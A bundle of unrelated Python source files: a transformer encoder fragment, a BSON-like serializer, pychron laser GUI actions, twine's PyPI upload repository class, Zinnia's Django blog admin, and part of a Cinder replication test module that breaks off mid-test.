if output_all_encoded_layers:
all_encoder_layers1.append(embedding1)
all_encoder_layers2.append(embedding2)
for idx in range(start2, len(self.layers2)):
embedding2 = self.layers2[idx](embedding2, attention_mask2).hidden_states
for idx in range(start1, len(self.layers1)):
embedding1 = self.layers1[idx](embedding1, attention_mask1).hidden_states
# add the end part to finish.
if not output_all_encoded_layers:
all_encoder_layers1.append(embedding1)
all_encoder_layers2.append(embedding2)
return (
torch.stack(all_encoder_layers1, dim=-1),
torch.stack(all_encoder_layers2, dim=-1),
)
@classmethod
def _from_config(cls, config: "PretrainedConfig", **kwargs):
final_kwargs = {}
final_kwargs["num_hidden_layers1"] = config.num_hidden_layers
final_kwargs["hidden_size1"] = config.hidden_size
final_kwargs["num_attention_heads1"] = config.num_attention_heads
final_kwargs["attention_dropout1"] = config.attention_probs_dropout_prob
final_kwargs["hidden_dropout1"] = config.hidden_dropout_prob
final_kwargs["intermediate_size1"] = config.intermediate_size
final_kwargs["activation"] = config.hidden_act
final_kwargs.update(**kwargs)
return cls(**final_kwargs)
| |
"""Similar to, but incompatible with BSON"""
import struct
import cStringIO
import calendar
import pytz
from datetime import datetime
__all__ = ['dumps', 'dump', 'loads', 'load']
def dumps(value):
buff = cStringIO.StringIO()
encode(value, buff)
return buff.getvalue()
def dump(value, stream):
encode(value, stream)
def loads(bytes):
buff = cStringIO.StringIO(bytes)
return load(buff)
def load(stream):
return decode(stream)
_type_by_magic = {
'\x01': "dict",
'\x02': "list",
'\x03': "double",
'\x04': "unicode",
'\x05': "binary",
'\x06': "bool",
'\x07': "datetime",
'\x08': "int32",
'\x09': "int64",
'\x10': "none"
}
_magic_by_type = {}
for k,v in _type_by_magic.items():
_magic_by_type[v] = k
_encode_by_type = {}
_decode_by_type = {}
def encode(value, stream):
type_name = None
if isinstance(value, float):
type_name = 'double'
elif isinstance(value, unicode):
type_name = 'unicode'
elif isinstance(value, str):
type_name = 'binary'
elif isinstance(value, bool):
type_name = 'bool'
elif isinstance(value, datetime):
type_name = 'datetime'
elif isinstance(value, int):
if value < -0x80000000 or value > 0x7fffffff:
type_name = 'int64'
else:
type_name = 'int32'
elif isinstance(value, long):
type_name = 'int64'
elif value is None:
type_name = 'none'
if type_name is not None:
encode_fn = _encode_by_type[type_name]
bytes = encode_fn(value)
length = len(bytes)
magic = _magic_by_type[type_name]
stream.write(magic)
stream.write(struct.pack('>I', length))
stream.write(bytes)
elif isinstance(value, dict):
encode_dict(value, stream)
elif isinstance(value, (list, tuple)):
encode_list(value, stream)
else:
raise ValueError, "I have no idea how to encode '%s'" % str(value)
class StopDecoding(Exception):
pass
def decode(stream):
type_name = read_type(stream)
if type_name == 'dict':
return decode_dict(stream)
elif type_name == 'list':
return decode_list(stream)
else:
decode_fn = _decode_by_type[type_name]
data = read_chunk(stream)
return decode_fn(data)
def read_type(stream):
magic = stream.read(1)
if not magic:
raise StopDecoding
if magic == '\x00':
raise StopDecoding
type_name = _type_by_magic.get(magic)
if not type_name:
raise ValueError, "Unable to decode, unknown magic number %s" % str(magic).encode('string-escape')
return type_name
def read_chunk(stream):
data = stream.read(struct.calcsize('>I'))
if not data:
raise StopDecoding
length = struct.unpack('>I', data)[0]
if length == 0:
return ''
data = stream.read(length)
if not data:
raise StopDecoding
if len(data) < length:
raise ValueError, "Unexpected end of stream"
return data
def encode_double(value):
return struct.pack('>d', value)
def decode_double(bytes):
return struct.unpack('>d', bytes)[0]
def encode_unicode(value):
return value.encode('utf8')
def decode_unicode(bytes):
return bytes.decode('utf-8')
def encode_binary(value):
return value
def decode_binary(bytes):
return bytes
def encode_bool(value):
return struct.pack('>b', 1 if value else 0)
def decode_bool(bytes):
value = struct.unpack('>b', bytes)[0]
return bool(value)
def encode_datetime(value):
ms = calendar.timegm(value.utctimetuple()) * 1000 + value.microsecond / 1000.0
return struct.pack('>d', ms)
def decode_datetime(bytes):
ms = struct.unpack('>d', bytes)[0]
return datetime.fromtimestamp(ms / 1000.0, pytz.utc)
def encode_none(value):
return ''
def decode_none(bytes):
return None
def encode_int32(value):
return struct.pack('>i', value)
def decode_int32(bytes):
return struct.unpack('>i', bytes)[0]
def encode_int64(value):
return struct.pack('>q', value)
def decode_int64(bytes):
return struct.unpack('>q', bytes)[0]
def encode_dict(value, stream):
stream.write(_magic_by_type['dict'])
for k,v in value.items():
encode(k, stream)
encode(v, stream)
stream.write('\x00')
def decode_dict(stream):
d = {}
while True:
try:
k = decode(stream)
d[k] = decode(stream)
except StopDecoding:
break
return d
def encode_list(value, stream):
stream.write(_magic_by_type['list'])
for v in value:
encode(v, stream)
stream.write('\x00')
def decode_list(stream):
l = []
while True:
try:
l.append(decode(stream))
except StopDecoding:
break
return l
_locals = locals()
for k in _magic_by_type.keys():
_encode_by_type[k] = _locals['encode_%s' % k]
_decode_by_type[k] = _locals['decode_%s' % k]
| |
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
# from traits.api import HasTraits
# from traitsui.api import View, Item
from __future__ import absolute_import
from pyface.action.action import Action
from pyface.tasks.action.task_action import TaskAction
from pychron.envisage.view_util import open_view
from pychron.lasers.laser_managers.ilaser_manager import ILaserManager
from pychron.lasers.laser_managers.pychron_laser_manager import PychronLaserManager
from pychron.lasers.pattern.pattern_maker_view import PatternMakerView
class BaseLaserAction(Action):
manager_name = None
manager = None
def _get_manager(self, event, app=None):
if self.manager is not None:
manager = self.manager
else:
if app is None:
app = event.task.window.application
manager = app.get_service(ILaserManager,
'name=="{}"'.format(self.manager_name))
return manager
class LocalLaserAction(BaseLaserAction):
client_action = False
def __init__(self, manager, *args, **kw):
super(LocalLaserAction, self).__init__(*args, **kw)
# man = self._get_manager(None, app=self.window.application)
if isinstance(manager, PychronLaserManager) and not self.client_action:
self.enabled = False
self.manager = manager
# class ExecutePatternAction(LocalLaserAction):
# name = 'Execute Pattern'
#
# def perform(self, event):
# manager = self._get_manager(event)
# if manager is not None:
# manager.execute_pattern()
#
# class ExecuteAndLasePatternAction(LocalLaserAction):
# name = 'Execute Pattern and Lase'
#
# def perform(self, event):
# manager = self._get_manager(event)
# if manager is not None:
# manager.execute_pattern(lase=True)
class OpenScannerAction(LocalLaserAction):
name = 'Open Scanner...'
accelerator = 'Ctrl+T'
def perform(self, event):
manager = self._get_manager(event)
if manager is not None:
manager.open_scanner()
class OpenAutoTunerAction(LocalLaserAction):
name = 'Open AutoTuner...'
# accelerator = 'Ctrl+T'
def perform(self, event):
manager = self._get_manager(event)
if manager is not None:
manager.open_autotuner()
class LaserTaskAction(TaskAction):
# def perform(self, event=None):
# app = self.task.window.application
# method = self._get_attr(self.object, self.method)
# if method:
# method()
# else:
# for i in ('pychron.fusions.co2', 'pychron.fusions.diode'):
# task = app.get_task(i, activate=False)
# method = self._get_attr(task, self.method)
# if method:
# method()
# break
_enabled = None
def _task_changed(self):
if self.task:
if self.task.id in ('pychron.fusions.co2',
'pychron.fusions.diode'):
enabled = True
if self.enabled_name:
if self.object:
enabled = bool(self._get_attr(self.object,
self.enabled_name, False))
if enabled:
self._enabled = True
else:
self._enabled = False
def _enabled_update(self):
"""
reimplement ListeningAction's _enabled_update
"""
if self.enabled_name:
if self.object:
self.enabled = bool(self._get_attr(self.object,
self.enabled_name, False))
else:
self.enabled = False
elif self._enabled is not None:
self.enabled = self._enabled
else:
self.enabled = bool(self.object)
# class TestDegasAction(LaserTaskAction):
# name = 'Test Degas...'
# method = 'test_degas'
class OpenPatternAction(Action):
name = 'Open Pattern...'
def perform(self, event=None):
pm = PatternMakerView()
if pm.load_pattern():
open_view(pm)
class NewPatternAction(Action):
name = 'New Pattern...'
method = 'new_pattern'
def perform(self, event=None):
pm = PatternMakerView()
open_view(pm)
class LaserCalibrationAction(Action):
def _get_task(self, event):
app = event.task.window.application
task_id = 'pychron.laser.calibration'
task = app.get_task(task_id)
return task
class PowerMapAction(LaserCalibrationAction):
name = 'New Power Map...'
def perform(self, event):
task = self._get_task(event)
task.new_power_map()
class OpenPowerMapAction(LaserCalibrationAction):
name = 'Open Power Map'
accelerator = 'Ctrl+3'
def perform(self, event):
app = event.task.window.application
task_id = 'pychron.laser.calibration'
task = app.get_task(task_id, activate=False)
ps = task.get_power_maps()
if ps:
if task.window.control.isvisible():
task.window.control.raise_()
else:
task.window.open()
task.open_power_maps(ps)
class PowerCalibrationAction(LaserCalibrationAction):
name = 'Power Calibration...'
def perform(self, event):
task = self._get_task(event)
task.new_power_calibration()
class PyrometerCalibrationAction(LaserCalibrationAction):
name = 'Pyrometer Calibration'
def perform(self, event):
task = self._get_task(event)
task.new_pyrometer_calibration()
class PIDTuningAction(LaserCalibrationAction):
name = 'PID Tuning'
def perform(self, event):
task = self._get_task(event)
task.new_pid_tuner()
class LaserScriptExecuteAction(TaskAction):
method = 'show_laser_script_executor'
name = 'Laser Script...'
# ============= EOF =============================================
| |
# Copyright 2015 Ian Cordasco
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import sys
from typing import Any, Dict, List, Optional, Set, Tuple, cast
import requests
import requests_toolbelt
import tqdm
import urllib3
from requests import adapters
from requests_toolbelt.utils import user_agent
import twine
from twine import package as package_file
KEYWORDS_TO_NOT_FLATTEN = {"gpg_signature", "content"}
LEGACY_PYPI = "https://pypi.python.org/"
LEGACY_TEST_PYPI = "https://testpypi.python.org/"
WAREHOUSE = "https://upload.pypi.org/"
OLD_WAREHOUSE = "https://upload.pypi.io/"
TEST_WAREHOUSE = "https://test.pypi.org/"
WAREHOUSE_WEB = "https://pypi.org/"
logger = logging.getLogger(__name__)
class ProgressBar(tqdm.tqdm):
def update_to(self, n: int) -> None:
"""Update the bar in the way compatible with requests-toolbelt.
This is identical to tqdm.update, except ``n`` will be the current
value - not the delta as tqdm expects.
"""
self.update(n - self.n) # will also do self.n = n
class Repository:
def __init__(
self,
repository_url: str,
username: Optional[str],
password: Optional[str],
disable_progress_bar: bool = False,
) -> None:
self.url = repository_url
self.session = requests.session()
# requests.Session.auth should be Union[None, Tuple[str, str], ...]
# But username or password could be None
# See TODO for utils.RepositoryConfig
self.session.auth = (
(username or "", password or "") if username or password else None
)
logger.info(f"username: {username if username else '<empty>'}")
logger.info(f"password: <{'hidden' if password else 'empty'}>")
self.session.headers["User-Agent"] = self._make_user_agent_string()
for scheme in ("http://", "https://"):
self.session.mount(scheme, self._make_adapter_with_retries())
# Working around https://github.com/python/typing/issues/182
self._releases_json_data: Dict[str, Dict[str, Any]] = {}
self.disable_progress_bar = disable_progress_bar
@staticmethod
def _make_adapter_with_retries() -> adapters.HTTPAdapter:
retry = urllib3.Retry(
allowed_methods=["GET"],
connect=5,
total=10,
status_forcelist=[500, 501, 502, 503],
)
return adapters.HTTPAdapter(max_retries=retry)
@staticmethod
def _make_user_agent_string() -> str:
from twine import cli
dependencies = cli.list_dependencies_and_versions()
user_agent_string = (
user_agent.UserAgentBuilder("twine", twine.__version__)
.include_extras(dependencies)
.include_implementation()
.build()
)
return cast(str, user_agent_string)
def close(self) -> None:
self.session.close()
@staticmethod
def _convert_data_to_list_of_tuples(data: Dict[str, Any]) -> List[Tuple[str, Any]]:
data_to_send = []
for key, value in data.items():
if key in KEYWORDS_TO_NOT_FLATTEN or not isinstance(value, (list, tuple)):
data_to_send.append((key, value))
else:
for item in value:
data_to_send.append((key, item))
return data_to_send
def set_certificate_authority(self, cacert: Optional[str]) -> None:
if cacert:
self.session.verify = cacert
def set_client_certificate(self, clientcert: Optional[str]) -> None:
if clientcert:
self.session.cert = clientcert
def register(self, package: package_file.PackageFile) -> requests.Response:
data = package.metadata_dictionary()
data.update({":action": "submit", "protocol_version": "1"})
print(f"Registering {package.basefilename}")
data_to_send = self._convert_data_to_list_of_tuples(data)
encoder = requests_toolbelt.MultipartEncoder(data_to_send)
resp = self.session.post(
self.url,
data=encoder,
allow_redirects=False,
headers={"Content-Type": encoder.content_type},
)
# Bug 28. Try to silence a ResourceWarning by releasing the socket.
resp.close()
return resp
def _upload(self, package: package_file.PackageFile) -> requests.Response:
data = package.metadata_dictionary()
data.update(
{
# action
":action": "file_upload",
"protocol_version": "1",
}
)
data_to_send = self._convert_data_to_list_of_tuples(data)
print(f"Uploading {package.basefilename}")
with open(package.filename, "rb") as fp:
data_to_send.append(
("content", (package.basefilename, fp, "application/octet-stream"))
)
encoder = requests_toolbelt.MultipartEncoder(data_to_send)
with ProgressBar(
total=encoder.len,
unit="B",
unit_scale=True,
unit_divisor=1024,
miniters=1,
file=sys.stdout,
disable=self.disable_progress_bar,
) as bar:
monitor = requests_toolbelt.MultipartEncoderMonitor(
encoder, lambda monitor: bar.update_to(monitor.bytes_read)
)
resp = self.session.post(
self.url,
data=monitor,
allow_redirects=False,
headers={"Content-Type": monitor.content_type},
)
return resp
def upload(
self, package: package_file.PackageFile, max_redirects: int = 5
) -> requests.Response:
number_of_redirects = 0
while number_of_redirects < max_redirects:
resp = self._upload(package)
if resp.status_code == requests.codes.OK:
return resp
if 500 <= resp.status_code < 600:
number_of_redirects += 1
print(
'Received "{status_code}: {reason}" Package upload '
"appears to have failed. Retry {retry} of "
"{max_redirects}".format(
status_code=resp.status_code,
reason=resp.reason,
retry=number_of_redirects,
max_redirects=max_redirects,
)
)
else:
return resp
return resp
def package_is_uploaded(
self, package: package_file.PackageFile, bypass_cache: bool = False
) -> bool:
# NOTE(sigmavirus24): Not all indices are PyPI and pypi.io doesn't
# have a similar interface for finding the package versions.
if not self.url.startswith((LEGACY_PYPI, WAREHOUSE, OLD_WAREHOUSE)):
return False
safe_name = package.safe_name
releases = None
if not bypass_cache:
releases = self._releases_json_data.get(safe_name)
if releases is None:
url = "{url}pypi/{package}/json".format(package=safe_name, url=LEGACY_PYPI)
headers = {"Accept": "application/json"}
response = self.session.get(url, headers=headers)
if response.status_code == 200:
releases = response.json()["releases"]
else:
releases = {}
self._releases_json_data[safe_name] = releases
packages = releases.get(package.metadata.version, [])
for uploaded_package in packages:
if uploaded_package["filename"] == package.basefilename:
return True
return False
def release_urls(self, packages: List[package_file.PackageFile]) -> Set[str]:
if self.url.startswith(WAREHOUSE):
url = WAREHOUSE_WEB
elif self.url.startswith(TEST_WAREHOUSE):
url = TEST_WAREHOUSE
else:
return set()
return {
"{}project/{}/{}/".format(url, package.safe_name, package.metadata.version)
for package in packages
}
def verify_package_integrity(self, package: package_file.PackageFile) -> None:
# TODO(sigmavirus24): Add a way for users to download the package and
# check it's hash against what it has locally.
pass
| |
"""EntryAdmin for Zinnia"""
from django.contrib import admin
from django.db.models import Q
from django.utils import timezone
from django.contrib.sites.models import Site
from django.core.urlresolvers import reverse
from django.core.urlresolvers import NoReverseMatch
from django.utils.translation import ungettext_lazy
from django.utils.translation import ugettext_lazy as _
from zinnia import settings
from zinnia.managers import HIDDEN
from zinnia.managers import PUBLISHED
from zinnia.models.author import Author
from zinnia.ping import DirectoryPinger
from zinnia.admin.forms import EntryAdminForm
from zinnia.admin.filters import AuthorListFilter
from zinnia.admin.filters import CategoryListFilter
from zinnia.comparison import EntryPublishedVectorBuilder
class EntryAdmin(admin.ModelAdmin):
"""
Admin for Entry model.
"""
form = EntryAdminForm
date_hierarchy = 'creation_date'
fieldsets = (
(_('Content'), {
'fields': (('title', 'status'), 'lead', 'content',)}),
(_('Illustration'), {
'fields': ('image', 'image_caption'),
'classes': ('collapse', 'collapse-closed')}),
(_('Publication'), {
'fields': (('start_publication', 'end_publication'),
'creation_date', 'sites'),
'classes': ('collapse', 'collapse-closed')}),
(_('Discussions'), {
'fields': ('comment_enabled', 'pingback_enabled',
'trackback_enabled'),
'classes': ('collapse', 'collapse-closed')}),
(_('Privacy'), {
'fields': ('login_required', 'password'),
'classes': ('collapse', 'collapse-closed')}),
(_('Templates'), {
'fields': ('content_template', 'detail_template'),
'classes': ('collapse', 'collapse-closed')}),
(_('Metadatas'), {
'fields': ('featured', 'excerpt', 'authors', 'related'),
'classes': ('collapse', 'collapse-closed')}),
(None, {'fields': ('categories', 'tags', 'slug')}))
list_filter = (CategoryListFilter, AuthorListFilter, 'status', 'featured',
'login_required', 'comment_enabled', 'pingback_enabled',
'trackback_enabled', 'creation_date', 'start_publication',
'end_publication', 'sites')
list_display = ('get_title', 'get_authors', 'get_categories',
'get_tags', 'get_sites', 'get_is_visible', 'featured',
'get_short_url', 'creation_date')
radio_fields = {'content_template': admin.VERTICAL,
'detail_template': admin.VERTICAL}
filter_horizontal = ('categories', 'authors', 'related')
prepopulated_fields = {'slug': ('title', )}
search_fields = ('title', 'excerpt', 'content', 'tags')
actions = ['make_mine', 'make_published', 'make_hidden',
'close_comments', 'close_pingbacks', 'close_trackbacks',
'ping_directories', 'put_on_top',
'mark_featured', 'unmark_featured']
actions_on_top = True
actions_on_bottom = True
def __init__(self, model, admin_site):
self.form.admin_site = admin_site
super(EntryAdmin, self).__init__(model, admin_site)
# Custom Display
def get_title(self, entry):
"""
Return the title with word count and number of comments.
"""
title = _('%(title)s (%(word_count)i words)') % \
{'title': entry.title, 'word_count': entry.word_count}
reaction_count = int(entry.comment_count +
entry.pingback_count +
entry.trackback_count)
if reaction_count:
return ungettext_lazy(
'%(title)s (%(reactions)i reaction)',
'%(title)s (%(reactions)i reactions)', reaction_count) % \
{'title': title,
'reactions': reaction_count}
return title
get_title.short_description = _('title')
def get_authors(self, entry):
"""
Return the authors in HTML.
"""
try:
authors = ['<a href="%s" target="blank">%s</a>' %
(author.get_absolute_url(),
getattr(author, author.USERNAME_FIELD))
for author in entry.authors.all()]
except NoReverseMatch:
authors = [getattr(author, author.USERNAME_FIELD)
for author in entry.authors.all()]
return ', '.join(authors)
get_authors.allow_tags = True
get_authors.short_description = _('author(s)')
def get_categories(self, entry):
"""
Return the categories linked in HTML.
"""
try:
categories = ['<a href="%s" target="blank">%s</a>' %
(category.get_absolute_url(), category.title)
for category in entry.categories.all()]
except NoReverseMatch:
categories = [category.title for category in
entry.categories.all()]
return ', '.join(categories)
get_categories.allow_tags = True
get_categories.short_description = _('category(s)')
def get_tags(self, entry):
"""
Return the tags linked in HTML.
"""
try:
return ', '.join(['<a href="%s" target="blank">%s</a>' %
(reverse('zinnia:tag_detail', args=[tag]), tag)
for tag in entry.tags_list])
except NoReverseMatch:
return entry.tags
get_tags.allow_tags = True
get_tags.short_description = _('tag(s)')
def get_sites(self, entry):
"""
Return the sites linked in HTML.
"""
try:
index_url = reverse('zinnia:entry_archive_index')
except NoReverseMatch:
index_url = ''
return ', '.join(
['<a href="%s://%s%s" target="blank">%s</a>' %
(settings.PROTOCOL, site.domain, index_url, site.name)
for site in entry.sites.all()])
get_sites.allow_tags = True
get_sites.short_description = _('site(s)')
def get_short_url(self, entry):
"""
Return the short url in HTML.
"""
try:
short_url = entry.short_url
except NoReverseMatch:
short_url = entry.get_absolute_url()
return '<a href="%(url)s" target="blank">%(url)s</a>' % \
{'url': short_url}
get_short_url.allow_tags = True
get_short_url.short_description = _('short url')
def get_is_visible(self, entry):
"""
Admin wrapper for entry.is_visible.
"""
return entry.is_visible
get_is_visible.boolean = True
get_is_visible.short_description = _('is visible')
# Custom Methods
def get_queryset(self, request):
"""
Make special filtering by user's permissions.
"""
if not request.user.has_perm('zinnia.can_view_all'):
queryset = self.model.objects.filter(authors__pk=request.user.pk)
else:
queryset = super(EntryAdmin, self).get_queryset(request)
return queryset.prefetch_related('categories', 'authors', 'sites')
def get_changeform_initial_data(self, request):
"""
Provide initial datas when creating an entry.
"""
get_data = super(EntryAdmin, self).get_changeform_initial_data(request)
return get_data or {
'sites': [Site.objects.get_current().pk],
'authors': [request.user.pk]
}
def formfield_for_manytomany(self, db_field, request, **kwargs):
"""
Filter the disposable authors.
"""
if db_field.name == 'authors':
kwargs['queryset'] = Author.objects.filter(
Q(is_staff=True) | Q(entries__isnull=False)
).distinct()
return super(EntryAdmin, self).formfield_for_manytomany(
db_field, request, **kwargs)
def get_readonly_fields(self, request, obj=None):
"""
Return readonly fields by user's permissions.
"""
readonly_fields = list(super(EntryAdmin, self).get_readonly_fields(
request, obj))
if not request.user.has_perm('zinnia.can_change_status'):
readonly_fields.append('status')
if not request.user.has_perm('zinnia.can_change_author'):
readonly_fields.append('authors')
return readonly_fields
def get_actions(self, request):
"""
Define actions by user's permissions.
"""
actions = super(EntryAdmin, self).get_actions(request)
if not actions:
return actions
if (not request.user.has_perm('zinnia.can_change_author') or
not request.user.has_perm('zinnia.can_view_all')):
del actions['make_mine']
if not request.user.has_perm('zinnia.can_change_status'):
del actions['make_hidden']
del actions['make_published']
if not settings.PING_DIRECTORIES:
del actions['ping_directories']
return actions
# Custom Actions
def make_mine(self, request, queryset):
"""
Set the entries to the current user.
"""
author = Author.objects.get(pk=request.user.pk)
for entry in queryset:
if author not in entry.authors.all():
entry.authors.add(author)
self.message_user(
request, _('The selected entries now belong to you.'))
make_mine.short_description = _('Set the entries to the user')
def make_published(self, request, queryset):
"""
Set entries selected as published.
"""
queryset.update(status=PUBLISHED)
EntryPublishedVectorBuilder().cache_flush()
self.ping_directories(request, queryset, messages=False)
self.message_user(
request, _('The selected entries are now marked as published.'))
make_published.short_description = _('Set entries selected as published')
def make_hidden(self, request, queryset):
"""
Set entries selected as hidden.
"""
queryset.update(status=HIDDEN)
EntryPublishedVectorBuilder().cache_flush()
self.message_user(
request, _('The selected entries are now marked as hidden.'))
make_hidden.short_description = _('Set entries selected as hidden')
def close_comments(self, request, queryset):
"""
Close the comments for selected entries.
"""
queryset.update(comment_enabled=False)
self.message_user(
request, _('Comments are now closed for selected entries.'))
close_comments.short_description = _('Close the comments for '
'selected entries')
def close_pingbacks(self, request, queryset):
"""
Close the pingbacks for selected entries.
"""
queryset.update(pingback_enabled=False)
self.message_user(
request, _('Pingbacks are now closed for selected entries.'))
close_pingbacks.short_description = _(
'Close the pingbacks for selected entries')
def close_trackbacks(self, request, queryset):
"""
Close the trackbacks for selected entries.
"""
queryset.update(trackback_enabled=False)
self.message_user(
request, _('Trackbacks are now closed for selected entries.'))
close_trackbacks.short_description = _(
'Close the trackbacks for selected entries')
def put_on_top(self, request, queryset):
"""
Put the selected entries on top at the current date.
"""
queryset.update(creation_date=timezone.now())
self.ping_directories(request, queryset, messages=False)
self.message_user(request, _(
'The selected entries are now set at the current date.'))
put_on_top.short_description = _(
'Put the selected entries on top at the current date')
def mark_featured(self, request, queryset):
"""
Mark selected as featured post.
"""
queryset.update(featured=True)
self.message_user(
request, _('Selected entries are now marked as featured.'))
mark_featured.short_description = _('Mark selected entries as featured')
def unmark_featured(self, request, queryset):
"""
Un-Mark selected featured posts.
"""
queryset.update(featured=False)
self.message_user(
request, _('Selected entries are no longer marked as featured.'))
unmark_featured.short_description = _(
'Unmark selected entries as featured')
def ping_directories(self, request, queryset, messages=True):
"""
Ping web directories for selected entries.
"""
for directory in settings.PING_DIRECTORIES:
pinger = DirectoryPinger(directory, queryset)
pinger.join()
if messages:
success = 0
for result in pinger.results:
if not result.get('flerror', True):
success += 1
else:
self.message_user(request,
'%s : %s' % (directory,
result['message']))
if success:
self.message_user(
request,
_('%(directory)s directory succesfully '
'pinged %(success)d entries.') %
{'directory': directory, 'success': success})
ping_directories.short_description = _(
'Ping Directories for selected entries')
| |
# Copyright (c) 2016 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
import ddt
import mock
from oslo_config import cfg
from oslo_utils import timeutils
from cinder.common import constants
from cinder import exception
from cinder import objects
from cinder.objects import fields
from cinder.tests.unit import fake_constants as fake
from cinder.tests.unit import fake_service
from cinder.tests.unit import utils
from cinder.tests.unit import volume as base
import cinder.volume
from cinder.volume import manager
from cinder.volume import rpcapi as volume_rpcapi
from cinder.volume import utils as vol_utils
CONF = cfg.CONF
@ddt.ddt
class ReplicationTestCase(base.BaseVolumeTestCase):
def setUp(self):
super(ReplicationTestCase, self).setUp()
self.host = 'host@backend#pool'
self.manager = manager.VolumeManager(host=self.host)
@mock.patch('cinder.objects.VolumeList.get_all')
@mock.patch('cinder.volume.driver.BaseVD.failover_host',
side_effect=exception.InvalidReplicationTarget(''))
@ddt.data(('backend2', 'default', fields.ReplicationStatus.FAILED_OVER),
('backend2', 'backend3', fields.ReplicationStatus.FAILED_OVER),
(None, 'backend2', fields.ReplicationStatus.ENABLED),
('', 'backend2', fields.ReplicationStatus.ENABLED))
@ddt.unpack
def test_failover_host_invalid_target(self, svc_backend, new_backend,
expected, mock_failover,
mock_getall):
"""Test replication failover_host with invalid_target.
When failingover fails due to an invalid target exception we return
replication_status to its previous status, and we decide what that is
depending on the currect active backend.
"""
svc = utils.create_service(
self.context,
{'host': self.host,
'binary': constants.VOLUME_BINARY,
'active_backend_id': svc_backend,
'replication_status': fields.ReplicationStatus.FAILING_OVER})
self.manager.failover_host(self.context, new_backend)
mock_getall.assert_called_once_with(self.context,
filters={'host': self.host})
mock_failover.assert_called_once_with(self.context,
[],
secondary_id=new_backend,
groups=[])
db_svc = objects.Service.get_by_id(self.context, svc.id)
self.assertEqual(expected, db_svc.replication_status)
@mock.patch('cinder.volume.driver.BaseVD.failover_host',
mock.Mock(side_effect=exception.VolumeDriverException('')))
def test_failover_host_driver_exception(self):
svc = utils.create_service(
self.context,
{'host': self.host,
'binary': constants.VOLUME_BINARY,
'active_backend_id': None,
'replication_status': fields.ReplicationStatus.FAILING_OVER})
self.manager.failover_host(self.context, mock.sentinel.backend_id)
db_svc = objects.Service.get_by_id(self.context, svc.id)
self.assertEqual(fields.ReplicationStatus.FAILOVER_ERROR,
db_svc.replication_status)
@mock.patch('cinder.objects.Service.is_up', True)
@mock.patch.object(volume_rpcapi.VolumeAPI, 'failover')
@mock.patch.object(cinder.db, 'conditional_update')
@mock.patch.object(objects.ServiceList, 'get_all')
def test_failover(self, mock_get_all, mock_db_update, mock_failover):
"""Test replication failover."""
service = fake_service.fake_service_obj(self.context,
binary='cinder-volume')
mock_get_all.return_value = [service]
mock_db_update.return_value = {'replication_status': 'enabled'}
volume_api = cinder.volume.api.API()
volume_api.failover(self.context, host=CONF.host, cluster_name=None)
mock_failover.assert_called_once_with(self.context, service, None)
@mock.patch.object(volume_rpcapi.VolumeAPI, 'failover')
@mock.patch.object(cinder.db, 'conditional_update')
@mock.patch.object(cinder.db, 'service_get_all')
def test_failover_unexpected_status(self, mock_db_get_all, mock_db_update,
mock_failover):
"""Test replication failover unexpected status."""
mock_db_get_all.return_value = [fake_service.fake_service_obj(
self.context,
binary='cinder-volume')]
mock_db_update.return_value = None
volume_api = cinder.volume.api.API()
self.assertRaises(exception.InvalidInput,
volume_api.failover,
self.context,
host=CONF.host,
cluster_name=None)
@mock.patch.object(volume_rpcapi.VolumeAPI, 'freeze_host')
@mock.patch.object(cinder.db, 'conditional_update', return_value=1)
@mock.patch.object(cinder.objects.ServiceList, 'get_all')
def test_freeze_host(self, mock_get_all, mock_db_update,
mock_freeze):
"""Test replication freeze_host."""
service = fake_service.fake_service_obj(self.context,
binary='cinder-volume')
mock_get_all.return_value = [service]
mock_freeze.return_value = True
volume_api = cinder.volume.api.API()
volume_api.freeze_host(self.context, host=CONF.host, cluster_name=None)
mock_freeze.assert_called_once_with(self.context, service)
@mock.patch.object(volume_rpcapi.VolumeAPI, 'freeze_host')
@mock.patch.object(cinder.db, 'conditional_update')
@mock.patch.object(cinder.db, 'service_get_all')
def test_freeze_host_unexpected_status(self, mock_get_all,
mock_db_update,
mock_freeze):
"""Test replication freeze_host unexpected status."""
mock_get_all.return_value = [fake_service.fake_service_obj(
self.context,
binary='cinder-volume')]
mock_db_update.return_value = None
volume_api = cinder.volume.api.API()
self.assertRaises(exception.InvalidInput,
volume_api.freeze_host,
self.context,
host=CONF.host,
cluster_name=None)
@mock.patch.object(volume_rpcapi.VolumeAPI, 'thaw_host')
@mock.patch.object(cinder.db, 'conditional_update', return_value=1)
@mock.patch.object(cinder.objects.ServiceList, 'get_all')
def test_thaw_host(self, mock_get_all, mock_db_update,
mock_thaw):
"""Test replication thaw_host."""
service = fake_service.fake_service_obj(self.context,
binary='cinder-volume')
mock_get_all.return_value = [service]
mock_thaw.return_value = True
volume_api = cinder.volume.api.API()
volume_api.thaw_host(self.context, host=CONF.host, cluster_name=None)
mock_thaw.assert_called_once_with(self.context, service)
@mock.patch.object(volume_rpcapi.VolumeAPI, 'thaw_host')
@mock.patch.object(cinder.db, 'conditional_update')
@mock.patch.object(cinder.db, 'service_get_all')
def test_thaw_host_unexpected_status(self, mock_get_all,
mock_db_update,
mock_thaw):
"""Test replication thaw_host unexpected status."""
mock_get_all.return_value = [fake_service.fake_service_obj(
self.context,
binary='cinder-volume')]
mock_db_update.return_value = None
volume_api = cinder.volume.api.API()
